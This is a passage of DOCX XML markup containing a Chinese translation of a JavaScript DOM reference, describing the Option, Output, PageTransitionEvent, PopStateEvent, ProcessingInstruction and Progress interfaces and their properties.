        <w:t>optgroup</w:t>
      </w:r>
      <w:r>
        <w:t>＞有</w:t>
      </w:r>
      <w:r>
        <w:t>HTML disabled</w:t>
      </w:r>
      <w:r>
        <w:t>属性的话，它们将</w:t>
      </w:r>
      <w:r>
        <w:t>禁用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Form form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素所属的＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，如果存在的话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long index</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素在它包含的</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素中的索引。（该属性的相关内容也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLOptionsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string label</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果存在对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML label</w:t>
      </w:r>
      <w:r>
        <w:t>属性的话，返回这个属性的值；否则返回当前</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean selected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果本选项当前处于选中状态则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>），返回的值头尾的空白字符都已去掉，同时两个或多个连续的空格也会替换为一个空格。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML value</w:t>
      </w:r>
      <w:r>
        <w:t>属性的话，返回这个属性的值；否则返回当前元素的</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="860" w:name="Output"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="860"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单＜</w:t>
      </w:r>
      <w:r>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>元素。在支持它的浏览器中，</w:t>
      </w:r>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>对象实现</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>的大多数属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string defaultValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性是</w:t>
      </w:r>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>）的初始值。当表单重置时，它的值将恢复为这个值。如果设置了这个属性，并且对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>元素当前正在显示它之前的</w:t>
      </w:r>
      <w:r>
        <w:t>defaultValue</w:t>
      </w:r>
      <w:r>
        <w:t>，则新的值将显示。否则，当前显示的值将不会改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly DOMSettableTokenList htmlFor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML for</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个空格分</w:t>
      </w:r>
      <w:r>
        <w:t>隔的由元素的</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>组成的列表，这些元素的值都会影响这个＜</w:t>
      </w:r>
      <w:r>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素显示的计算内容。因为</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的一个保留词，所以对应的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性名为</w:t>
      </w:r>
      <w:r>
        <w:t>htmlFor</w:t>
      </w:r>
      <w:r>
        <w:t>。可以像一个普通字符串值一样对这个属性进</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>行读写操作，或者使用</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>的方法来从这个列表查询并设置单个元素</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="861" w:name="PageTransitionEvent"/>
      <w:r>
        <w:t>PageTransitionEvent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="861"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>pageshow</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>pagehide</w:t>
      </w:r>
      <w:r>
        <w:t>事件的事件对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当一个文档首次加载时，在</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件之后，浏览器将触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>pageshow</w:t>
      </w:r>
      <w:r>
        <w:t>事件，之后，每次这个页面从内存历史缓存中恢复时都会触发一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>pageshow</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
      <w:r>
        <w:t>PageTransitionEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象与每个</w:t>
      </w:r>
      <w:r>
        <w:t>pageshow</w:t>
      </w:r>
      <w:r>
        <w:t>事件关联，当恢复而不是加载或重新加载页面时，这个对象的</w:t>
      </w:r>
      <w:r>
        <w:t>persisted</w:t>
      </w:r>
      <w:r>
        <w:t>属性将为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>pagehide</w:t>
      </w:r>
      <w:r>
        <w:t>事件也有一个关联的</w:t>
      </w:r>
      <w:r>
        <w:t>PageTransitionEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象，不过对</w:t>
      </w:r>
      <w:r>
        <w:t>pagehide</w:t>
      </w:r>
      <w:r>
        <w:t>事件而言对应的</w:t>
      </w:r>
      <w:r>
        <w:t>persisted</w:t>
      </w:r>
      <w:r>
        <w:t>属性总是为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>pageshow</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>pagehide</w:t>
      </w:r>
      <w:r>
        <w:t>事件在</w:t>
      </w:r>
      <w:r>
        <w:t>Wi</w:t>
      </w:r>
      <w:r>
        <w:t>ndow</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发。它们不冒泡，也没有可取消的默认行为。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean persisted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>pageshow</w:t>
      </w:r>
      <w:r>
        <w:t>事件来说，当从网络或硬盘缓存加载（或重新加载）页面时，这个属性为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。如果自内存缓存恢复正在显示的页面并且没有重新加载，则这个属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>pagehide</w:t>
      </w:r>
      <w:r>
        <w:t>事件来说，这个属性总是为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="862" w:name="PopStateEvent"/>
      <w:r>
        <w:t>PopStateEvent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="862"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>历史转换事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>管理自身的历史（参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序可使用</w:t>
      </w:r>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来在浏览历史中创建一个新的条目，并将一个状态值或对象与之关联。当用户使用浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前进</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮在这些保存的状态之间导航时，浏览器将在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>popstate</w:t>
      </w:r>
      <w:r>
        <w:t>事件，并传入关联的</w:t>
      </w:r>
      <w:r>
        <w:t>PopStateEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象中已保存的应用状态的一个副本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly any state</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个属性保存传入到</w:t>
      </w:r>
      <w:r>
        <w:t>History.pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>History.replaceState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法中的</w:t>
      </w:r>
      <w:r>
        <w:t>状态值或对象的一个副本。</w:t>
      </w:r>
      <w:r>
        <w:t>state</w:t>
      </w:r>
      <w:r>
        <w:t>可以是任意能用结构复制算法（参见</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）克隆的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="863" w:name="ProcessingInstruction"/>
      <w:r>
        <w:t>ProcessingInstruction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="863"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的进度指示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个不常用的接口表示</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的处理指令（</w:t>
      </w:r>
      <w:r>
        <w:t>Processing Instruction</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>PI</w:t>
      </w:r>
      <w:r>
        <w:t>）。使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的程序员永远不会遇到</w:t>
      </w:r>
      <w:r>
        <w:t>ProcessingInstruction</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>处理指令的内容（即，目标之后的第一个非空字符，直到但不包括结尾的</w:t>
      </w:r>
      <w:r>
        <w:t>“?</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string ta</w:t>
      </w:r>
      <w:r>
        <w:t>rget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>处理指令的目标。这是紧跟着开头的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>?”</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个标识符，它指定当前处理指令的目标</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>处理器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="864" w:name="Progress"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Progress</w:t>
      </w:r>
      <w:bookmarkEnd w:id="864"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>进度条</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Progress</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，以进度条的一个图形化表示方式，显示某种任务的完成度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果完成这项任务所需的工作的数量或时间未知，则</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>元素将处于不确定状态。在这种状态下，它只是简单地显示某种</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>工作</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>动画，表示有些事正在发生。如果任务的总数（或时间、字节）以及已完成数量都已知，则</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>元素将处于一种确定</w:t>
      </w:r>
      <w:r>
        <w:t>状态，可以以某种图形化的完成百分比的形式显示进度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>＞是一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>元素，在写作本书的时候，还没有广泛地支持。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Form form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前元素对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
